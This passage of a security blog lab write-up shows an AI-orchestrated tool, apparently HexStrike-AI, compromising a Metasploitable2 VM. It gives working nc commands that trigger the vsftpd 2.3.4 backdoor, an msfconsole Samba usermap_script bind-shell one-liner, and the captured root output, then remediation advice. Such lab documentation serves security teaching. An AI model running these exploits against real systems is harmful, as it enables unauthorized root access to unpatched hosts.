<p><strong>FTP (21)</strong></p>
</li>
<li class="">
<p><strong>SSH (22)</strong></p>
</li>
<li class="">
<p><strong>Telnet (23)</strong></p>
</li>
<li class="">
<p><strong>SMTP (25)</strong></p>
</li>
<li class="">
<p><strong>DNS (53)</strong></p>
</li>
<li class="">
<p><strong>HTTP (80)</strong></p>
</li>
<li class="">
<p><strong>RPCbind (111)</strong></p>
</li>
<li class="">
<p><strong>SMB (139/445)</strong></p>
</li>
<li class="">
<p><strong>rlogin/rsh (513/514)</strong></p>
</li>
<li class="">
<p><strong>NFS (2049)</strong></p>
</li>
<li class="">
<p><strong>FTP alt (2121)</strong></p>
</li>
<li class="">
<p><strong>MySQL (3306)</strong></p>
</li>
<li class="">
<p><strong>PostgreSQL (5432)</strong></p>
</li>
<li class="">
<p><strong>VNC (5900)</strong></p>
</li>
<li class="">
<p><strong>X11 (6000)</strong></p>
</li>
<li class="">
<p><strong>AJP (8009)</strong></p>
</li>
</ul>
<p><img decoding="async" loading="lazy" src="https://cdn-images-1.medium.com/max/800/1*M-KtDpNJKOmzKguYuZsk3A.png" alt="Article screenshot" class="img_ev3q"></p>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="host-identity-confirmation">Host identity confirmation<a href="#host-identity-confirmation" class="hash-link" aria-label="Direct link to Host identity confirmation" title="Direct link to Host identity confirmation" translate="no">​</a></h3>
<p>The HTTP landing page provided a definitive marker:</p>
<div class="language-text codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-text codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><div class="token-line" style="color:#393A34"><span class="token plain">curl -s http://172.16.163.129:80 | </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">head</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain"> -n 5</span><br></div></code></pre></div></div>
<p>Output included:</p>
<ul>
<li class=""><code>&amp;lt;title&amp;gt;Metasploitable2 - Linux&amp;lt;/title&amp;gt;</code></li>
</ul>
<p>At this point, the test shifted from “general assessment” to “known vulnerable image validation” — meaning we should expect multiple published RCE paths.</p>
<h2 class="anchor anchorTargetStickyNavbar_Vzrq" id="phase-3-vulnerability-discovery-what-stood-out-immediately">Phase 3: Vulnerability Discovery (What Stood Out Immediately)<a href="#phase-3-vulnerability-discovery-what-stood-out-immediately" class="hash-link" aria-label="Direct link to Phase 3: Vulnerability Discovery (What Stood Out Immediately)" title="Direct link to Phase 3: Vulnerability Discovery (What Stood Out Immediately)" translate="no">​</a></h2>
<p>Two services were immediate critical flags due to<strong>known RCE history</strong>in this lab image:</p>
<ul>
<li class="">
<p><strong>vsftpd 2.3.4</strong>(commonly backdoored in lab builds)</p>
</li>
<li class="">
<p><strong>Samba 3.0.20</strong>(classic usermap_script RCE path)</p>
</li>
</ul>
<p>Rather than listing every CVE possible for every old service, the workflow focused on:</p>
<ul>
<li class="">
<p>vulnerabilities with<strong>direct, reliable exploitability</strong></p>
</li>
<li class="">
<p>minimal risk of destabilizing the host</p>
</li>
<li class="">
<p>clear PoC output validation</p>
</li>
</ul>
<p><img decoding="async" loading="lazy" src="https://cdn-images-1.medium.com/max/800/1*i537IaV4nzH-Yl0WAUFAbA.png" alt="Article screenshot" class="img_ev3q"></p>
<h2 class="anchor anchorTargetStickyNavbar_Vzrq" id="phase-4-exploitation-with-proofs">Phase 4: Exploitation (With Proofs)<a href="#phase-4-exploitation-with-proofs" class="hash-link" aria-label="Direct link to Phase 4: Exploitation (With Proofs)" title="Direct link to Phase 4: Exploitation (With Proofs)" translate="no">​</a></h2>
<p><img decoding="async" loading="lazy" src="https://cdn-images-1.medium.com/max/800/1*Cwm_odt5ix6oogYUhn6w-Q.png" alt="Article screenshot" class="img_ev3q"></p>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="exploit-1--vsftpd-234-backdoor-cve-20112523--root">Exploit #1 — vsftpd 2.3.4 backdoor (CVE-2011–2523) → Root<a href="#exploit-1--vsftpd-234-backdoor-cve-20112523--root" class="hash-link" aria-label="Direct link to Exploit #1 — vsftpd 2.3.4 backdoor (CVE-2011–2523) → Root" title="Direct link to Exploit #1 — vsftpd 2.3.4 backdoor (CVE-2011–2523) → Root" translate="no">​</a></h3>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="why-it-worked">Why it worked<a href="#why-it-worked" class="hash-link" aria-label="Direct link to Why it worked" title="Direct link to Why it worked" translate="no">​</a></h3>
<p>In the Metasploitable2 build, vsftpd is intentionally vulnerable. A crafted username containing<code>:)</code>triggers a backdoor listener (commonly on TCP/6200).</p>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="step-a--trigger-the-backdoor">Step A — Trigger the backdoor<a href="#step-a--trigger-the-backdoor" class="hash-link" aria-label="Direct link to Step A — Trigger the backdoor" title="Direct link to Step A — Trigger the backdoor" translate="no">​</a></h3>
<div class="language-text codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-text codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><div class="token-line" style="color:#393A34"><span class="token plain">(printf </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">&quot;USER test:)</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">\r</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">\n</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">PASS test</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">\r</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">\n</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">QUIT</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">\r</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">\n</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">&quot;</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">; sleep </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">1</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">) </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">|</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain"> nc </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">-</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">nv </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">-</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">w </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">2</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain"> </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">172.16</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">.</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">163.129</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain"> </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">21</span><br></div></code></pre></div></div>
<p>This confirmed:</p>
<ul>
<li class="">
<p>FTP reachable</p>
</li>
<li class="">
<p>banner:<code>220 (vsFTPd 2.3.4)</code></p>
</li>
</ul>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="step-b--connect-to-backdoor-shell-and-capture-proof">Step B — Connect to backdoor shell and capture proof<a href="#step-b--connect-to-backdoor-shell-and-capture-proof" class="hash-link" aria-label="Direct link to Step B — Connect to backdoor shell and capture proof" title="Direct link to Step B — Connect to backdoor shell and capture proof" translate="no">​</a></h3>
<div class="language-text codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-text codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><div class="token-line" style="color:#393A34"><span class="token plain">printf </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">&quot;id</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">\n</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">uname -a</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">\n</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">whoami</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">\n</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">pwd</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">\n</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">&quot;</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain"> </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">|</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain"> nc </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">-</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">nv </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">-</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">w </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">3</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain"> </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">172.16</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">.</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">163.129</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain"> </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">6200</span><br></div></code></pre></div></div>
<p><strong>Proof (captured output):</strong></p>
<div class="language-text codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-text codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><div class="token-line" style="color:#393A34"><span class="token plain">uid</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">=</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">0</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">(</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">root</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">)</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain"> gid</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">=</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">0</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">(</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">root</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">)</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">Linux metasploitable </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">2.6</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">.</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">24</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">-</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">16</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">-server </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">#1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">root</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">/</span><br></div></code></pre></div></div>
<p>**Impact:**Unauthenticated Remote Code Execution →<strong>root</strong>.</p>
<p>No persistence was deployed. No further actions were taken.</p>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="exploit-2--samba-usermap_script-cve-20072447--root-bind-shell">Exploit #2 — Samba usermap_script (CVE-2007–2447) → Root bind shell<a href="#exploit-2--samba-usermap_script-cve-20072447--root-bind-shell" class="hash-link" aria-label="Direct link to Exploit #2 — Samba usermap_script (CVE-2007–2447) → Root bind shell" title="Direct link to Exploit #2 — Samba usermap_script (CVE-2007–2447) → Root bind shell" translate="no">​</a></h3>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="why-it-worked-1">Why it worked<a href="#why-it-worked-1" class="hash-link" aria-label="Direct link to Why it worked" title="Direct link to Why it worked" translate="no">​</a></h3>
<p>Samba 3.0.20 has a well-known remote command execution vulnerability via the username map script feature. Metasploit automates exploitation.</p>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="tooling-nuance-why-a-bind-shell-was-used">Tooling nuance: why a bind shell was used<a href="#tooling-nuance-why-a-bind-shell-was-used" class="hash-link" aria-label="Direct link to Tooling nuance: why a bind shell was used" title="Direct link to Tooling nuance: why a bind shell was used" translate="no">​</a></h3>
<p>The first Metasploit run produced unstable command shell behavior (sessions closing quickly and command execution differences between session types). The workflow pivoted to a<strong>bind shell payload</strong>, which is often more reliable in constrained environments.</p>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="step-a--launch-exploit-with-bind-netcat-payload-binds-on-port-4446">Step A — Launch exploit with bind netcat payload (binds on port 4446)<a href="#step-a--launch-exploit-with-bind-netcat-payload-binds-on-port-4446" class="hash-link" aria-label="Direct link to Step A — Launch exploit with bind netcat payload (binds on port 4446)" title="Direct link to Step A — Launch exploit with bind netcat payload (binds on port 4446)" translate="no">​</a></h3>
<div class="language-text codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-text codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><div class="token-line" style="color:#393A34"><span class="token plain">msfconsole -q -x </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">&#x27;use exploit/multi/samba/usermap_script; \</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">set</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain"> RHOSTS </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">172.16</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">.</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">163.129</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">; </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">set</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain"> RPORT </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">139</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">; \</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">set</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain"> payload cmd/unix/bind_netcat; \</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">set</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain"> LPORT </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">4446</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">; </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">set</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain"> DisablePayloadHandler </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">true</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">; \</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">exploit -z; </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">exit</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain"> -y</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">&#x27;</span><br></div></code></pre></div></div>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="step-b--connect-to-bind-shell-and-capture-proof">Step B — Connect to bind shell and capture proof<a href="#step-b--connect-to-bind-shell-and-capture-proof" class="hash-link" aria-label="Direct link to Step B — Connect to bind shell and capture proof" title="Direct link to Step B — Connect to bind shell and capture proof" translate="no">​</a></h3>
<div class="language-text codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-text codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><div class="token-line" style="color:#393A34"><span class="token plain">printf </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">&quot;id</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">\n</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">uname -a</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">\n</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">whoami</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">\n</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">pwd</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">\n</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">&quot;</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain"> </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">|</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain"> nc </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">-</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">nv </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">-</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">w </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">3</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain"> </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">172.16</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">.</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">163.129</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain"> </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">4446</span><br></div></code></pre></div></div>
<p><strong>Proof (captured output):</strong></p>
<div class="language-text codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-text codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><div class="token-line" style="color:#393A34"><span class="token plain">uid</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">=</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">0</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">(</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">root</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">)</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain"> gid</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">=</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">0</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">(</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">root</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">)</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">Linux metasploitable </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">2.6</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">.</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">24</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">-</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">16</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">-server </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">#1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">root</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">/</span><br></div></code></pre></div></div>
<p>**Impact:**Unauthenticated Remote Code Execution →<strong>root</strong>.</p>
<p><img decoding="async" loading="lazy" src="https://cdn-images-1.medium.com/max/800/1*4DkOtawu-LswnG3baLupuA.png" alt="Article screenshot" class="img_ev3q"></p>
<h2 class="anchor anchorTargetStickyNavbar_Vzrq" id="final-results-summary">Final Results Summary<a href="#final-results-summary" class="hash-link" aria-label="Direct link to Final Results Summary" title="Direct link to Final Results Summary" translate="no">​</a></h2>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="what-was-validated">What was validated<a href="#what-was-validated" class="hash-link" aria-label="Direct link to What was validated" title="Direct link to What was validated" translate="no">​</a></h3>
<ul>
<li class="">
<p>Broad service exposure consistent with Metasploitable2</p>
</li>
<li class="">
<p><strong>Two separate unauthenticated root compromises</strong>, each independently sufficient for full takeover:</p>
</li>
<li class="">
<p>vsftpd backdoor (TCP/6200)</p>
</li>
<li class="">
<p>Samba usermap_script (bind shell on TCP/4446)</p>
</li>
</ul>
<p><img decoding="async" loading="lazy" src="https://cdn-images-1.medium.com/max/800/1*upLkdxiWzfTbKmUNw6A5rg.png" alt="Article screenshot" class="img_ev3q"></p>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="what-was-intentionally-not-done">What was intentionally not done<a href="#what-was-intentionally-not-done" class="hash-link" aria-label="Direct link to What was intentionally not done" title="Direct link to What was intentionally not done" translate="no">​</a></h3>
<ul>
<li class="">
<p>No persistence / backdoors</p>
</li>
<li class="">
<p>No credential harvesting</p>
</li>
<li class="">
<p>No data collection beyond proof commands</p>
</li>
<li class="">
<p>No lateral movement testing</p>
</li>
</ul>
<p>This kept the test strictly PoC-focused.</p>
<h2 class="anchor anchorTargetStickyNavbar_Vzrq" id="remediation-recommendations-real-world-perspective">Remediation Recommendations (Real-World Perspective)<a href="#remediation-recommendations-real-world-perspective" class="hash-link" aria-label="Direct link to Remediation Recommendations (Real-World Perspective)" title="Direct link to Remediation Recommendations (Real-World Perspective)" translate="no">​</a></h2>
<p>Metasploitable2 is intentionally insecure. In real systems, the remediation playbook is clear.</p>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="critical">Critical<a href="#critical" class="hash-link" aria-label="Direct link to Critical" title="Direct link to Critical" translate="no">​</a></h3>
<ul>
<li class="">
<p>Remove backdoored/vulnerable services immediately</p>
</li>
<li class="">
<p>Never expose training VMs on networks shared with real assets</p>
</li>
<li class="">
<p>Enforce segmentation (lab VLAN / host-only networks)</p>
</li>
</ul>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="high">High<a href="#high" class="hash-link" aria-label="Direct link to High" title="Direct link to High" translate="no">​</a></h3>
<ul>
<li class="">
<p>Remove legacy cleartext and trust-based services:</p>
</li>
<li class="">
<p>Telnet</p>
</li>
<li class="">
<p>rsh/rlogin</p>
</li>
<li class="">
<p>VNC / X11 (unless strictly controlled)</p>
</li>
<li class="">
<p>Restrict SMB exposure and enforce modern versions/configs</p>
</li>
</ul>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="medium">Medium<a href="#medium" class="hash-link" aria-label="Direct link to Medium" title="Direct link to Medium" translate="no">​</a></h3>
<ul>
<li class="">
<p>Disable obsolete crypto (SSLv2) and weak ciphers</p>
</li>
<li class="">
<p>Remove version banners and harden HTTP stack</p>
</li>
<li class="">
<p>Restrict AJP to localhost/internal networks only</p>
</li>
</ul>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="low">Low<a href="#low" class="hash-link" aria-label="Direct link to Low" title="Direct link to Low" translate="no">​</a></h3>
<ul>
<li class="">
<p>Reduce attack surface: firewall by default, allowlist by source</p>
</li>
<li class="">
<p>Continuous inventory and exposure monitoring</p>
</li>
</ul>
<h2 class="anchor anchorTargetStickyNavbar_Vzrq" id="why-this-matters">Why This Matters<a href="#why-this-matters" class="hash-link" aria-label="Direct link to Why This Matters" title="Direct link to Why This Matters" translate="no">​</a></h2>
<p>This test highlights the real value of AI in offensive workflows:</p>
<p>AI did not “replace” pentesting skills.
It<strong>amplified</strong>them.</p>
<p>The LLM-driven workflow:</p>
<ul>
<li class="">
<p>selected practical next steps</p>
</li>
<li class="">
<p>adapted to missing tools and privilege constraints</p>
</li>
<li class="">
<p>pivoted when sessions were unstable</p>
</li>
<li class="">
<p>still produced clean PoC artifacts</p>
</li>
</ul>
<p>The operator still matters — but the<strong>mental overhead drops sharply</strong>.</p>
<h2 class="anchor anchorTargetStickyNavbar_Vzrq" id="final-thoughts">Final Thoughts<a href="#final-thoughts" class="hash-link" aria-label="Direct link to Final Thoughts" title="Direct link to Final Thoughts" translate="no">​</a></h2>
<p>HexStrike-AI is not a toy. Used correctly, it behaves like a junior pentester with perfect memory and infinite patience — executing exactly what you instruct and iterating until it gets results.</p></div></article><nav class="docusaurus-mt-lg pagination-nav" aria-label="Docs pages"><a class="pagination-nav__link pagination-nav__link--prev" href="/medium-blog-navigation/docs/labs/hexstrike-home-network-lab"><div class="pagination-nav__sublabel">Previous</div><div class="pagination-nav__label">AI-Driven Pentesting at Home: Using HexStrike-AI for Full Network Discovery and Exploitation</div></a><a class="pagination-nav__link pagination-nav__link--next" href="/medium-blog-navigation/docs/labs/hexstrike-subnet-compromise-lab"><div class="pagination-nav__sublabel">Next</div><div class="pagination-nav__label">HexStrike + Cursor (MCP): From Single Target → Full Subnet Compromise (Lab PT Walkthrough)</div></a></nav></div></div><div class="col col--3"><div class="tableOfContents_bqdL thin-scrollbar theme-doc-toc-desktop"><ul class="table-of-contents table-of-contents__left-border"><li><a href="#ecosystem-fit" class="table-of-contents__link toc-highlight">Ecosystem Fit</a></li><li><a href="#deployment-requirements" class="table-of-contents__link toc-highlight">Deployment Requirements</a><ul><li><a href="#how-i-used-an-llm-orchestrated-toolchain-to-enumerate-and-exploit-a-deliberately-vulnerable-host-with-real-proofs" class="table-of-contents__link toc-highlight">How I Used an LLM-Orchestrated Toolchain to Enumerate and Exploit a Deliberately Vulnerable Host (With Real Proofs)</a></li></ul></li><li><a href="#introduction" class="table-of-contents__link toc-highlight">Introduction</a><ul><li><a href="#core-guides-and-setup" class="table-of-contents__link toc-highlight">Core Guides and Setup</a></li><li><a href="#practical-applications--lab-comparisons" class="table-of-contents__link toc-highlight">Practical Applications &amp; Lab Comparisons</a></li><li><a href="#specific-tooling--technique-guides" class="table-of-contents__link toc-highlight">Specific Tooling &amp; Technique Guides</a></li></ul></li><li><a href="#what-is-hexstrike-ai" class="table-of-contents__link toc-highlight">What Is HexStrike-AI?</a></li><li><a href="#test-scope--authorization" class="table-of-contents__link toc-highlight">Test Scope &amp; Authorization</a></li><li><a href="#scope" class="table-of-contents__link toc-highlight">Scope</a></li><li><a href="#the-prompt-that-started-everything" class="table-of-contents__link toc-highlight">The Prompt That Started Everything</a></li><li><a href="#phase-1-reachability-and-discovery" class="table-of-contents__link toc-highlight">Phase 1: Reachability and Discovery</a></li><li><a href="#phase-2-enumeration--service-fingerprinting" class="table-of-contents__link toc-highlight">Phase 2: Enumeration &amp; Service Fingerprinting</a><ul><li><a href="#confirmed-exposed-services-high-level" class="table-of-contents__link toc-highlight">Confirmed exposed services (high-level)</a></li><li><a href="#host-identity-confirmation" class="table-of-contents__link toc-highlight">Host identity confirmation</a></li></ul></li><li><a href="#phase-3-vulnerability-discovery-what-stood-out-immediately" class="table-of-contents__link toc-highlight">Phase 3: Vulnerability Discovery (What Stood Out Immediately)</a></li><li><a href="#phase-4-exploitation-with-proofs" class="table-of-contents__link toc-highlight">Phase 4: Exploitation (With Proofs)</a><ul><li><a href="#exploit-1--vsftpd-234-backdoor-cve-20112523--root" class="table-of-contents__link toc-highlight">Exploit #1 — vsftpd 2.3.4 backdoor (CVE-2011–2523) → Root</a></li><li><a href="#why-it-worked" class="table-of-contents__link toc-highlight">Why it worked</a></li><li><a href="#step-a--trigger-the-backdoor" class="table-of-contents__link toc-highlight">Step A — Trigger the backdoor</a></li><li><a href="#step-b--connect-to-backdoor-shell-and-capture-proof" class="table-of-contents__link toc-highlight">Step B — Connect to backdoor shell and capture proof</a></li><li><a href="#exploit-2--samba-usermap_script-cve-20072447--root-bind-shell" class="table-of-contents__link toc-highlight">Exploit #2 — Samba usermap_script (CVE-2007–2447) → Root bind shell</a></li><li><a href="#why-it-worked-1" class="table-of-contents__link toc-highlight">Why it worked</a></li><li><a href="#tooling-nuance-why-a-bind-shell-was-used" class="table-of-contents__link toc-highlight">Tooling nuance: why a bind shell was used</a></li><li><a href="#step-a--launch-exploit-with-bind-netcat-payload-binds-on-port-4446" class="table-of-contents__link toc-highlight">Step A — Launch exploit with bind netcat payload (binds on port 4446)</a></li><li><a href="#step-b--connect-to-bind-shell-and-capture-proof" class="table-of-contents__link toc-highlight">Step B — Connect to bind shell and capture proof</a></li></ul></li><li><a href="#final-results-summary" class="table-of-contents__link toc-highlight">Final Results Summary</a><ul><li><a href="#what-was-validated" class="table-of-contents__link toc-highlight">What was validated</a></li><li><a href="#what-was-intentionally-not-done" class="table-of-contents__link toc-highlight">What was intentionally not done</a></li></ul></li><li><a href="#remediation-recommendations-real-world-perspective" class="table-of-contents__link toc-highlight">Remediation Recommendations (Real-World Perspective)</a><ul><li><a href="#critical" class="table-of-contents__link toc-highlight">Critical</a></li><li><a href="#high" class="table-of-contents__link toc-highlight">High</a></li><li><a href="#medium" class="table-of-contents__link toc-highlight">Medium</a></li><li><a href="#low" class="table-of-contents__link toc-highlight">Low</a></li></ul></li><li><a href="#why-this-matters" class="table-of-contents__link toc-highlight">Why This Matters</a></li><li><a href="#final-thoughts" class="table-of-contents__link toc-highlight">Final Thoughts</a></li></ul></div></div></div></div></main></div></div></div><footer class="site-footer" data-site-shell="standalone" data-site-shell-version="2026-07-24.1"><div class="shared-footer-inner"><a class="shared-footer-brand" href="/"><img src="/assets/ap-logo.png" alt="" width="32" height="32" loading="lazy" decoding="async"><span><strong>Andrey Pautov</strong><small>Security research</small></span></a><nav class="shared-footer-links" aria-label="Footer navigation"><a href="/cti.html">Research</a><a href="/guides.html">Library</a><a href="/projects.html">Products &amp; Labs</a><a href="/adversarygraph/">AdversaryGraph</a><a href="/about.html">About</a></nav><nav class="shared-footer-meta" aria-label="Site information"><a href="/privacy.html">Privacy / Data 